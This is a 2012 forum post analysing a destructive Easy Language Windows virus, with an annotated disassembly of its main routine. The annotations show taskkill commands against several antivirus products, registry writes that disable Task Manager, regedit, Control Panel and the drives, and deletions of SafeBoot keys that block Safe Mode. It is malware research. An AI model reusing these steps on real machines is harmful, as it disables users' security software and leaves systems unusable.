Thend
Posted on 2012-9-17 19:57
Basic information:
Report title: Analysis of a malicious program
Author: Thend
Report updated: 2012.09.17
Sample first seen: unknown
Sample type: destructive virus
Sample MD5: 654C2392FFD3D4A6843CF86100940779
Packer: none
Language: Easy Language (易语言)
Systems at risk: Windows
Related vulnerabilities: none
Summary:
The virus starts by repeatedly popping up a prank message box. It then looks for the processes of most antivirus products on the market and kills them, and then performs a series of registry operations that disable and hide most of the computer's functions, leaving the machine unusable.
Symptoms on an infected system:
Hidden: all files and folders; the Start menu's "Run", "Shut Down", "Log Off", "Search" and "Log On" entries; disk drives; drives; Folder Options; the IE home page option group; the IE File menu; the IE Favorites bar; Internet Options.
Disabled: Control Panel, Task Manager, drives, printing, IE "View Source", IE downloads, right-click context menus, restarting into the DOS environment, the Documents menu, the right mouse button.
All antivirus software shut down. All application icons changed. The .txt, .inf, .reg and .exe file associations modified.
File system changes:
Creates 43.vbs, 24.bat, 59.bat and 6.vbs in C:\Windows\system32 and deletes them after they have run.
Registry changes:
See the code analysis.
Analysis of the main body: <STRONG>0040C155 55 push ebp ; entry point
0040C156 8BEC mov ebp,esp
0040C158 81EC 1C000000 sub esp,0x1C
; every "call 样本.0040E528" below enters the Easy Language runtime: ebx selects the library function, each argument is pushed as a (type, 0, value) triple with 0x80000004 = text, 0x80000301 = integer, 0x80000002 = logical and 0x80000601 = double, and the final push is the argument count; for the registry writes (ebx = 0x6A4) the integer pushed just before the count is the root key (1 = HKEY_CLASSES_ROOT, 3 = HKEY_CURRENT_USER, 4 = HKEY_LOCAL_MACHINE)
0040C15E 68 04000080 push 0x80000004
0040C163 6A 00 push 0x0
0040C165 68 CB904000 push 样本.004090CB
0040C16A 68 01000000 push 0x1
0040C16F BB 60010000 mov ebx,0x160
0040C174 E8 AF230000 call 样本.0040E528 ; pops up a message box
0040C179 83C4 10 add esp,0x10
0040C17C 68 03000080 push 0x80000003
0040C181 52 push edx
0040C182 50 push eax
0040C183 68 01000000 push 0x1
0040C188 BB 14020000 mov ebx,0x214
0040C18D E8 96230000 call 样本.0040E528 ; pops up a message box
0040C192 83C4 10 add esp,0x10
0040C195 6A 00 push 0x0
0040C197 6A 00 push 0x0
0040C199 6A 00 push 0x0
0040C19B 68 01030080 push 0x80000301
0040C1A0 6A 00 push 0x0
0040C1A2 68 14000000 push 0x14
0040C1A7 68 04000080 push 0x80000004
0040C1AC 6A 00 push 0x0
0040C1AE 68 DA904000 push 样本.004090DA
0040C1B3 68 03000000 push 0x3
0040C1B8 BB 00030000 mov ebx,0x300
0040C1BD E8 66230000 call 样本.0040E528 ; pops up a message box
0040C1C2 83C4 28 add esp,0x28
0040C1C5 6A 00 push 0x0
0040C1C7 6A 00 push 0x0
0040C1C9 6A 00 push 0x0
0040C1CB 68 01030080 push 0x80000301
0040C1D0 6A 00 push 0x0
0040C1D2 68 14000000 push 0x14
0040C1D7 68 04000080 push 0x80000004
0040C1DC 6A 00 push 0x0
0040C1DE 68 DA904000 push 样本.004090DA
0040C1E3 68 03000000 push 0x3
0040C1E8 BB 00030000 mov ebx,0x300
0040C1ED E8 36230000 call 样本.0040E528 ; pops up a message box
0040C1F2 83C4 28 add esp,0x28
0040C1F5 6A 00 push 0x0
0040C1F7 6A 00 push 0x0
0040C1F9 6A 00 push 0x0
0040C1FB 68 01030080 push 0x80000301
0040C200 6A 00 push 0x0
0040C202 68 14000000 push 0x14
0040C207 68 04000080 push 0x80000004
0040C20C 6A 00 push 0x0
0040C20E 68 DA904000 push 样本.004090DA
0040C213 68 03000000 push 0x3
0040C218 BB 00030000 mov ebx,0x300
0040C21D E8 06230000 call 样本.0040E528 ; pops up a message box
0040C222 83C4 28 add esp,0x28
0040C225 6A 00 push 0x0
0040C227 6A 00 push 0x0
0040C229 6A 00 push 0x0
0040C22B 68 01030080 push 0x80000301
0040C230 6A 00 push 0x0
0040C232 68 14000000 push 0x14
0040C237 68 04000080 push 0x80000004
0040C23C 6A 00 push 0x0
0040C23E 68 DA904000 push 样本.004090DA
0040C243 68 03000000 push 0x3
0040C248 BB 00030000 mov ebx,0x300
0040C24D E8 D6220000 call 样本.0040E528 ; pops up a message box
0040C252 83C4 28 add esp,0x28
0040C255 68 01030080 push 0x80000301
0040C25A 6A 00 push 0x0
0040C25C 68 01000000 push 0x1
0040C261 68 02000080 push 0x80000002
0040C266 6A 00 push 0x0
0040C268 68 00000000 push 0x0
0040C26D 68 04000080 push 0x80000004
0040C272 6A 00 push 0x0
0040C274 68 F1904000 push 样本.004090F1 ; ASCII "taskkill /f /im kavsvc.exe"
0040C279 68 03000000 push 0x3
0040C27E BB C0020000 mov ebx,0x2C0
0040C283 E8 A0220000 call 样本.0040E528 ; shuts down Kaspersky (kavsvc.exe)
0040C288 83C4 28 add esp,0x28
0040C28B 68 01030080 push 0x80000301
0040C290 6A 00 push 0x0
0040C292 68 01000000 push 0x1
0040C297 68 02000080 push 0x80000002
0040C29C 6A 00 push 0x0
0040C29E 68 00000000 push 0x0
0040C2A3 68 04000080 push 0x80000004
0040C2A8 6A 00 push 0x0
0040C2AA 68 0C914000 push 样本.0040910C ; ASCII "taskkill /f /im KVXP.kxp"
0040C2AF 68 03000000 push 0x3
0040C2B4 BB C0020000 mov ebx,0x2C0
0040C2B9 E8 6A220000 call 样本.0040E528 ; shuts down Jiangmin (KVXP.kxp)
0040C2BE 83C4 28 add esp,0x28
0040C2C1 68 01030080 push 0x80000301
0040C2C6 6A 00 push 0x0
0040C2C8 68 01000000 push 0x1
0040C2CD 68 02000080 push 0x80000002
0040C2D2 6A 00 push 0x0
0040C2D4 68 00000000 push 0x0
0040C2D9 68 04000080 push 0x80000004
0040C2DE 6A 00 push 0x0
0040C2E0 68 25914000 push 样本.00409125 ; ASCII "taskkill /f /im Rav.exe"
0040C2E5 68 03000000 push 0x3
0040C2EA BB C0020000 mov ebx,0x2C0
0040C2EF E8 34220000 call 样本.0040E528 ; shuts down a Rising process
0040C2F4 83C4 28 add esp,0x28
0040C2F7 68 01030080 push 0x80000301
0040C2FC 6A 00 push 0x0
0040C2FE 68 01000000 push 0x1
0040C303 68 02000080 push 0x80000002
0040C308 6A 00 push 0x0
0040C30A 68 00000000 push 0x0
0040C30F 68 04000080 push 0x80000004
0040C314 6A 00 push 0x0
0040C316 68 3D914000 push 样本.0040913D ; ASCII "taskkill /f /im Ravmon.exe"
0040C31B 68 03000000 push 0x3
0040C320 BB C0020000 mov ebx,0x2C0
0040C325 E8 FE210000 call 样本.0040E528 ; shuts down a Rising process
0040C32A 83C4 28 add esp,0x28
0040C32D 68 01030080 push 0x80000301
0040C332 6A 00 push 0x0
0040C334 68 01000000 push 0x1
0040C339 68 02000080 push 0x80000002
0040C33E 6A 00 push 0x0
0040C340 68 00000000 push 0x0
0040C345 68 04000080 push 0x80000004
0040C34A 6A 00 push 0x0
0040C34C 68 58914000 push 样本.00409158 ; ASCII "taskkill /f /im Mcshield.exe"
0040C351 68 03000000 push 0x3
0040C356 BB C0020000 mov ebx,0x2C0
0040C35B E8 C8210000 call 样本.0040E528 ; shuts down the McAfee VirusScan core process
0040C360 83C4 28 add esp,0x28
0040C363 68 01030080 push 0x80000301
0040C368 6A 00 push 0x0
0040C36A 68 01000000 push 0x1
0040C36F 68 02000080 push 0x80000002
0040C374 6A 00 push 0x0
0040C376 68 00000000 push 0x0
0040C37B 68 04000080 push 0x80000004
0040C380 6A 00 push 0x0
0040C382 68 75914000 push 样本.00409175 ; ASCII "taskkill /f /im VsTskMgr.exe"
0040C387 68 03000000 push 0x3
0040C38C BB C0020000 mov ebx,0x2C0
0040C391 E8 92210000 call 样本.0040E528 ; shuts down part of the McAfee Internet Security suite
0040C396 83C4 28 add esp,0x28
0040C399 68 01030080 push 0x80000301
0040C39E 6A 00 push 0x0
0040C3A0 68 00000000 push 0x0
0040C3A5 68 04000080 push 0x80000004
0040C3AA 6A 00 push 0x0
0040C3AC 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess"
0040C3B1 68 01030080 push 0x80000301
0040C3B6 6A 00 push 0x0
0040C3B8 68 04000000 push 0x4
0040C3BD 68 03000000 push 0x3
0040C3C2 BB A4060000 mov ebx,0x6A4
0040C3C7 E8 5C210000 call 样本.0040E528 ; sets ExecAccess to 0
0040C3CC 83C4 28 add esp,0x28
0040C3CF 68 01030080 push 0x80000301
0040C3D4 6A 00 push 0x0
0040C3D6 68 00000000 push 0x0
0040C3DB 68 04000080 push 0x80000004
0040C3E0 6A 00 push 0x0
0040C3E2 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess"
0040C3E7 68 01030080 push 0x80000301
0040C3EC 6A 00 push 0x0
0040C3EE 68 04000000 push 0x4
0040C3F3 68 03000000 push 0x3
0040C3F8 BB A4060000 mov ebx,0x6A4
0040C3FD E8 26210000 call 样本.0040E528 ; sets MonAccess to 0
0040C402 83C4 28 add esp,0x28
0040C405 68 01030080 push 0x80000301
0040C40A 6A 00 push 0x0
0040C40C 68 00000000 push 0x0
0040C411 68 04000080 push 0x80000004
0040C416 6A 00 push 0x0
0040C418 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess"
0040C41D 68 01030080 push 0x80000301
0040C422 6A 00 push 0x0
0040C424 68 04000000 push 0x4
0040C429 68 03000000 push 0x3
0040C42E BB A4060000 mov ebx,0x6A4
0040C433 E8 F0200000 call 样本.0040E528 ; sets SiteAccess to 0
0040C438 83C4 28 add esp,0x28
0040C43B 68 01030080 push 0x80000301
0040C440 6A 00 push 0x0
0040C442 68 00000000 push 0x0
0040C447 68 04000080 push 0x80000004
0040C44C 6A 00 push 0x0
0040C44E 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess"
0040C453 68 01030080 push 0x80000301
0040C458 6A 00 push 0x0
0040C45A 68 04000000 push 0x4
0040C45F 68 03000000 push 0x3
0040C464 BB A4060000 mov ebx,0x6A4
0040C469 E8 BA200000 call 样本.0040E528 ; sets UDiskAccess to 0
0040C46E 83C4 28 add esp,0x28
0040C471 68 01030080 push 0x80000301
0040C476 6A 00 push 0x0
0040C478 68 01000000 push 0x1
0040C47D 68 02000080 push 0x80000002
0040C482 6A 00 push 0x0
0040C484 68 00000000 push 0x0
0040C489 68 04000080 push 0x80000004
0040C48E 6A 00 push 0x0
0040C490 68 22924000 push 样本.00409222 ; ASCII "taskkill /f /im 360tray.exe"
0040C495 68 03000000 push 0x3
0040C49A BB C0020000 mov ebx,0x2C0
0040C49F E8 84200000 call 样本.0040E528 ; kills the 360 real-time monitor process
0040C4A4 83C4 28 add esp,0x28
0040C4A7 68 04000080 push 0x80000004
0040C4AC 6A 00 push 0x0
0040C4AE 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040C4B3 68 04000080 push 0x80000004
0040C4B8 6A 00 push 0x0
0040C4BA 68 47924000 push 样本.00409247 ; ASCII ".txt"
0040C4BF 68 01030080 push 0x80000301
0040C4C4 6A 00 push 0x0
0040C4C6 68 01000000 push 0x1
0040C4CB 68 03000000 push 0x3
0040C4D0 BB A4060000 mov ebx,0x6A4
0040C4D5 E8 4E200000 call 样本.0040E528 ; changes the .txt file association (HKCR\.txt = jpegfile)
0040C4DA 83C4 28 add esp,0x28
0040C4DD 68 04000080 push 0x80000004
0040C4E2 6A 00 push 0x0
0040C4E4 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040C4E9 68 04000080 push 0x80000004
0040C4EE 6A 00 push 0x0
0040C4F0 68 4D924000 push 样本.0040924D ; ASCII ".inf"
0040C4F5 68 01030080 push 0x80000301
0040C4FA 6A 00 push 0x0
0040C4FC 68 01000000 push 0x1
0040C501 68 03000000 push 0x3
0040C506 BB A4060000 mov ebx,0x6A4
0040C50B E8 18200000 call 样本.0040E528 ; changes the .inf file association (HKCR\.inf = jpegfile)
0040C510 83C4 28 add esp,0x28
0040C513 68 01030080 push 0x80000301
0040C518 6A 00 push 0x0
0040C51A 68 00000000 push 0x0
0040C51F 68 04000080 push 0x80000004
0040C524 6A 00 push 0x0
0040C526 68 53924000 push 样本.00409253 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
0040C52B 68 01030080 push 0x80000301
0040C530 6A 00 push 0x0
0040C532 68 04000000 push 0x4
0040C537 68 03000000 push 0x3
0040C53C BB A4060000 mov ebx,0x6A4
0040C541 E8 E21F0000 call 样本.0040E528 ; sets CheckedValue to 0 so the system can no longer show hidden files
0040C546 83C4 28 add esp,0x28
0040C549 68 01030080 push 0x80000301
0040C54E 6A 00 push 0x0
0040C550 68 00000000 push 0x0
0040C555 68 04000080 push 0x80000004
0040C55A 6A 00 push 0x0
0040C55C 68 B2924000 push 样本.004092B2 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
0040C561 68 01030080 push 0x80000301
0040C566 6A 00 push 0x0
0040C568 68 03000000 push 0x3
0040C56D 68 03000000 push 0x3
0040C572 BB A4060000 mov ebx,0x6A4
0040C577 E8 AC1F0000 call 样本.0040E528 ; disables Task Manager
0040C57C 83C4 28 add esp,0x28
0040C57F 68 01030080 push 0x80000301
0040C584 6A 00 push 0x0
0040C586 68 01000000 push 0x1
0040C58B 68 04000080 push 0x80000004
0040C590 6A 00 push 0x0
0040C592 68 FB924000 push 样本.004092FB ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel"
0040C597 68 01030080 push 0x80000301
0040C59C 6A 00 push 0x0
0040C59E 68 03000000 push 0x3
0040C5A3 68 03000000 push 0x3
0040C5A8 BB A4060000 mov ebx,0x6A4
0040C5AD E8 761F0000 call 样本.0040E528 ; disables Control Panel
0040C5B2 83C4 28 add esp,0x28
0040C5B5 68 01030080 push 0x80000301
0040C5BA 6A 00 push 0x0
0040C5BC 68 01000000 push 0x1
0040C5C1 68 04000080 push 0x80000004
0040C5C6 6A 00 push 0x0
0040C5C8 68 46934000 push 样本.00409346 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools"
0040C5CD 68 01030080 push 0x80000301
0040C5D2 6A 00 push 0x0
0040C5D4 68 03000000 push 0x3
0040C5D9 68 03000000 push 0x3
0040C5DE BB A4060000 mov ebx,0x6A4
0040C5E3 E8 401F0000 call 样本.0040E528 ; disables the registry editing tools (regedit)
0040C5E8 83C4 28 add esp,0x28
0040C5EB 68 01030080 push 0x80000301
0040C5F0 6A 00 push 0x0
0040C5F2 68 01000000 push 0x1
0040C5F7 68 04000080 push 0x80000004
0040C5FC 6A 00 push 0x0
0040C5FE 68 95934000 push 样本.00409395 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
0040C603 68 01030080 push 0x80000301
0040C608 6A 00 push 0x0
0040C60A 68 03000000 push 0x3
0040C60F 68 03000000 push 0x3
0040C614 BB A4060000 mov ebx,0x6A4
0040C619 E8 0A1F0000 call 样本.0040E528 ; hides "Run" in the Start menu
0040C61E 83C4 28 add esp,0x28
0040C621 68 01030080 push 0x80000301
0040C626 6A 00 push 0x0
0040C628 68 01000000 push 0x1
0040C62D 68 04000080 push 0x80000004
0040C632 6A 00 push 0x0
0040C634 68 D7934000 push 样本.004093D7 ; ASCII "SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled"
0040C639 68 01030080 push 0x80000301
0040C63E 6A 00 push 0x0
0040C640 68 03000000 push 0x3
0040C645 68 03000000 push 0x3
0040C64A BB A4060000 mov ebx,0x6A4
0040C64F E8 D41E0000 call 样本.0040E528 ; disables the MS-DOS prompt (WinOldApp)
0040C654 83C4 28 add esp,0x28
0040C657 68 01060080 push 0x80000601
0040C65C 68 FFFFEF41 push 0x41EFFFFF
0040C661 68 0000E0FF push 0xFFE00000
0040C666 68 04000080 push 0x80000004
0040C66B 6A 00 push 0x0
0040C66D 68 21944000 push 样本.00409421 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives"
0040C672 68 01030080 push 0x80000301
0040C677 6A 00 push 0x0
0040C679 68 03000000 push 0x3
0040C67E 68 03000000 push 0x3
0040C683 BB A4060000 mov ebx,0x6A4
0040C688 E8 9B1E0000 call 样本.0040E528 ; hides all drives (the two dwords form the double 0x41EFFFFFFFE00000 = 4294967295, i.e. NoDrives = 0xFFFFFFFF, every drive bit set)
0040C68D 83C4 28 add esp,0x28
0040C690 68 01060080 push 0x80000601
0040C695 68 FFFFEF41 push 0x41EFFFFF
0040C69A 68 0000E0FF push 0xFFE00000
0040C69F 68 04000080 push 0x80000004
0040C6A4 6A 00 push 0x0
0040C6A6 68 66944000 push 样本.00409466 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive"
0040C6AB 68 01030080 push 0x80000301
0040C6B0 6A 00 push 0x0
0040C6B2 68 03000000 push 0x3
0040C6B7 68 03000000 push 0x3
0040C6BC BB A4060000 mov ebx,0x6A4
0040C6C1 E8 621E0000 call 样本.0040E528 ; blocks access to all drives (same 0xFFFFFFFF mask)
0040C6C6 83C4 28 add esp,0x28
0040C6C9 68 01030080 push 0x80000301
0040C6CE 6A 00 push 0x0
0040C6D0 68 01000000 push 0x1
0040C6D5 68 04000080 push 0x80000004
0040C6DA 6A 00 push 0x0
0040C6DC 68 B0944000 push 样本.004094B0 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions"
0040C6E1 68 01030080 push 0x80000301
0040C6E6 6A 00 push 0x0
0040C6E8 68 03000000 push 0x3
0040C6ED 68 03000000 push 0x3
0040C6F2 BB A4060000 mov ebx,0x6A4
0040C6F7 E8 2C1E0000 call 样本.0040E528 ; hides Folder Options
0040C6FC 83C4 28 add esp,0x28
0040C6FF 68 01030080 push 0x80000301
0040C704 6A 00 push 0x0
0040C706 68 01000000 push 0x1
0040C70B 68 04000080 push 0x80000004
0040C710 6A 00 push 0x0
0040C712 68 FC944000 push 样本.004094FC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop"
0040C717 68 01030080 push 0x80000301
0040C71C 6A 00 push 0x0
0040C71E 68 03000000 push 0x3
0040C723 68 03000000 push 0x3
0040C728 BB A4060000 mov ebx,0x6A4
0040C72D E8 F61D0000 call 样本.0040E528 ; hides desktop items
0040C732 83C4 28 add esp,0x28
0040C735 68 01030080 push 0x80000301
0040C73A 6A 00 push 0x0
0040C73C 68 01000000 push 0x1
0040C741 68 04000080 push 0x80000004
0040C746 6A 00 push 0x0
0040C748 68 42954000 push 样本.00409542 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"
0040C74D 68 01030080 push 0x80000301
0040C752 6A 00 push 0x0
0040C754 68 03000000 push 0x3
0040C759 68 03000000 push 0x3
0040C75E BB A4060000 mov ebx,0x6A4
0040C763 E8 C01D0000 call 样本.0040E528 ; hides "Shut Down" in the Start menu
0040C768 83C4 28 add esp,0x28
0040C76B 68 01030080 push 0x80000301
0040C770 6A 00 push 0x0
0040C772 68 01000000 push 0x1
0040C777 68 04000080 push 0x80000004
0040C77C 6A 00 push 0x0
0040C77E 68 86954000 push 样本.00409586 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind"
0040C783 68 01030080 push 0x80000301
0040C788 6A 00 push 0x0
0040C78A 68 03000000 push 0x3
0040C78F 68 03000000 push 0x3
0040C794 BB A4060000 mov ebx,0x6A4
0040C799 E8 8A1D0000 call 样本.0040E528 ; hides "Search" in the Start menu
0040C79E 83C4 28 add esp,0x28
0040C7A1 68 01030080 push 0x80000301
0040C7A6 6A 00 push 0x0
0040C7A8 68 01000000 push 0x1
0040C7AD 68 04000080 push 0x80000004
0040C7B2 6A 00 push 0x0
0040C7B4 68 C9954000 push 样本.004095C9 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage"
0040C7B9 68 01030080 push 0x80000301
0040C7BE 6A 00 push 0x0
0040C7C0 68 03000000 push 0x3
0040C7C5 68 03000000 push 0x3
0040C7CA BB A4060000 mov ebx,0x6A4
0040C7CF E8 541D0000 call 样本.0040E528 ; hides the IE home page options
0040C7D4 83C4 28 add esp,0x28
0040C7D7 68 01030080 push 0x80000301
0040C7DC 6A 00 push 0x0
0040C7DE 68 01000000 push 0x1
0040C7E3 68 04000080 push 0x80000004
0040C7E8 6A 00 push 0x0
0040C7EA 68 0E964000 push 样本.0040960E ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu"
0040C7EF 68 01030080 push 0x80000301
0040C7F4 6A 00 push 0x0
0040C7F6 68 03000000 push 0x3
0040C7FB 68 03000000 push 0x3
0040C800 BB A4060000 mov ebx,0x6A4
0040C805 E8 1E1D0000 call 样本.0040E528 ; hides the File menu (Explorer\NoFileMenu)
0040C80A 83C4 28 add esp,0x28
0040C80D 68 01030080 push 0x80000301
0040C812 6A 00 push 0x0
0040C814 68 01000000 push 0x1
0040C819 68 04000080 push 0x80000004
0040C81E 6A 00 push 0x0
0040C820 68 55964000 push 样本.00409655 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites"
0040C825 68 01030080 push 0x80000301
0040C82A 6A 00 push 0x0
0040C82C 68 03000000 push 0x3
0040C831 68 03000000 push 0x3
0040C836 BB A4060000 mov ebx,0x6A4
0040C83B E8 E81C0000 call 样本.0040E528 ; hides the IE Favorites
0040C840 83C4 28 add esp,0x28
0040C843 68 01030080 push 0x80000301
0040C848 6A 00 push 0x0
0040C84A 68 01000000 push 0x1
0040C84F 68 04000080 push 0x80000004
0040C854 6A 00 push 0x0
0040C856 68 9C964000 push 样本.0040969C ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting"
0040C85B 68 01030080 push 0x80000301
0040C860 6A 00 push 0x0
0040C862 68 03000000 push 0x3
0040C867 68 03000000 push 0x3
0040C86C BB A4060000 mov ebx,0x6A4
0040C871 E8 B21C0000 call 样本.0040E528 ; disables printing in IE
0040C876 83C4 28 add esp,0x28
0040C879 68 01030080 push 0x80000301
0040C87E 6A 00 push 0x0
0040C880 68 01000000 push 0x1
0040C885 68 04000080 push 0x80000004
0040C88A 6A 00 push 0x0
0040C88C 68 E2964000 push 样本.004096E2 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions"
0040C891 68 01030080 push 0x80000301
0040C896 6A 00 push 0x0
0040C898 68 03000000 push 0x3
0040C89D 68 03000000 push 0x3
0040C8A2 BB A4060000 mov ebx,0x6A4
0040C8A7 E8 7C1C0000 call 样本.0040E528 ; hides IE's Internet Options (NoBrowserOptions)
0040C8AC 83C4 28 add esp,0x28
0040C8AF 68 01030080 push 0x80000301
0040C8B4 6A 00 push 0x0
0040C8B6 68 01000000 push 0x1
0040C8BB 68 04000080 push 0x80000004
0040C8C0 6A 00 push 0x0
0040C8C2 68 2E974000 push 样本.0040972E ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource"
0040C8C7 68 01030080 push 0x80000301
0040C8CC 6A 00 push 0x0
0040C8CE 68 03000000 push 0x3
0040C8D3 68 03000000 push 0x3
0040C8D8 BB A4060000 mov ebx,0x6A4
0040C8DD E8 461C0000 call 样本.0040E528 ; disables IE "View Source"
0040C8E2 83C4 28 add esp,0x28
0040C8E5 68 01030080 push 0x80000301
0040C8EA 6A 00 push 0x0
0040C8EC 68 03000000 push 0x3
0040C8F1 68 04000080 push 0x80000004
0040C8F6 6A 00 push 0x0
0040C8F8 68 76974000 push 样本.00409776 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803"
0040C8FD 68 01030080 push 0x80000301
0040C902 6A 00 push 0x0
0040C904 68 03000000 push 0x3
0040C909 68 03000000 push 0x3
0040C90E BB A4060000 mov ebx,0x6A4
0040C913 E8 101C0000 call 样本.0040E528 ; disables IE downloads (zone 3 setting 1803 = 3; note the string reads "Interner Settings")
0040C918 83C4 28 add esp,0x28
0040C91B 68 01030080 push 0x80000301
0040C920 6A 00 push 0x0
0040C922 68 01000000 push 0x1
0040C927 68 04000080 push 0x80000004
0040C92C 6A 00 push 0x0
0040C92E 68 BF974000 push 样本.004097BF ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu"
0040C933 68 01030080 push 0x80000301
0040C938 6A 00 push 0x0
0040C93A 68 03000000 push 0x3
0040C93F 68 03000000 push 0x3
0040C944 BB A4060000 mov ebx,0x6A4
0040C949 E8 DA1B0000 call 样本.0040E528 ; disables the IE right-click context menu
0040C94E 83C4 28 add esp,0x28
0040C951 68 01030080 push 0x80000301
0040C956 6A 00 push 0x0
0040C958 68 01000000 push 0x1
0040C95D 68 04000080 push 0x80000004
0040C962 6A 00 push 0x0
0040C964 68 0F984000 push 样本.0040980F ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode"
0040C969 68 01030080 push 0x80000301
0040C96E 6A 00 push 0x0
0040C970 68 03000000 push 0x3
0040C975 68 03000000 push 0x3
0040C97A BB A4060000 mov ebx,0x6A4
0040C97F E8 A41B0000 call 样本.0040E528 ; disables restarting the computer into MS-DOS mode
0040C984 83C4 28 add esp,0x28
0040C987 68 01030080 push 0x80000301
0040C98C 6A 00 push 0x0
0040C98E 68 01000000 push 0x1
0040C993 68 04000080 push 0x80000004
0040C998 6A 00 push 0x0
0040C99A 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff"
0040C99F 68 01030080 push 0x80000301
0040C9A4 6A 00 push 0x0
0040C9A6 68 03000000 push 0x3
0040C9AB 68 03000000 push 0x3
0040C9B0 BB A4060000 mov ebx,0x6A4
0040C9B5 E8 6E1B0000 call 样本.0040E528 ; hides "Log Off" in the Start menu
0040C9BA 83C4 28 add esp,0x28
0040C9BD 68 01030080 push 0x80000301
0040C9C2 6A 00 push 0x0
0040C9C4 68 01000000 push 0x1
0040C9C9 68 04000080 push 0x80000004
0040C9CE 6A 00 push 0x0
0040C9D0 68 9B984000 push 样本.0040989B ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu"
0040C9D5 68 01030080 push 0x80000301
0040C9DA 6A 00 push 0x0
0040C9DC 68 03000000 push 0x3
0040C9E1 68 03000000 push 0x3
0040C9E6 BB A4060000 mov ebx,0x6A4
0040C9EB E8 381B0000 call 样本.0040E528 ; hides the Documents menu in the Start menu
0040C9F0 83C4 28 add esp,0x28
0040C9F3 68 01030080 push 0x80000301
0040C9F8 6A 00 push 0x0
0040C9FA 68 01000000 push 0x1
0040C9FF 68 04000080 push 0x80000004
0040CA04 6A 00 push 0x0
0040CA06 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff"
0040CA0B 68 01030080 push 0x80000301
0040CA10 6A 00 push 0x0
0040CA12 68 03000000 push 0x3
0040CA17 68 03000000 push 0x3
0040CA1C BB A4060000 mov ebx,0x6A4
0040CA21 E8 021B0000 call 样本.0040E528 ; hides "Log Off" in the Start menu (written a second time)
0040CA26 83C4 28 add esp,0x28
0040CA29 68 01030080 push 0x80000301
0040CA2E 6A 00 push 0x0
0040CA30 68 01000000 push 0x1
0040CA35 68 04000080 push 0x80000004
0040CA3A 6A 00 push 0x0
0040CA3C 68 E8984000 push 样本.004098E8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu"
0040CA41 68 01030080 push 0x80000301
0040CA46 6A 00 push 0x0
0040CA48 68 03000000 push 0x3
0040CA4D 68 03000000 push 0x3
0040CA52 BB A4060000 mov ebx,0x6A4
0040CA57 E8 CC1A0000 call 样本.0040E528 ; disables the right mouse button in Explorer
0040CA5C 83C4 28 add esp,0x28
0040CA5F 68 01030080 push 0x80000301
0040CA64 6A 00 push 0x0
0040CA66 68 01000000 push 0x1
0040CA6B 68 04000080 push 0x80000004
0040CA70 6A 00 push 0x0
0040CA72 68 36994000 push 样本.00409936 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders"
0040CA77 68 01030080 push 0x80000301
0040CA7C 6A 00 push 0x0
0040CA7E 68 03000000 push 0x3
0040CA83 68 03000000 push 0x3
0040CA88 BB A4060000 mov ebx,0x6A4
0040CA8D E8 961A0000 call 样本.0040E528 ; removes the Settings folders (Control Panel etc.) from the Start menu</STRONG>
Next it deletes registry keys to stop us from booting into Safe Mode (删除注册项 is Easy Language's delete-registry-key call; root key 4 is HKEY_LOCAL_MACHINE):
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
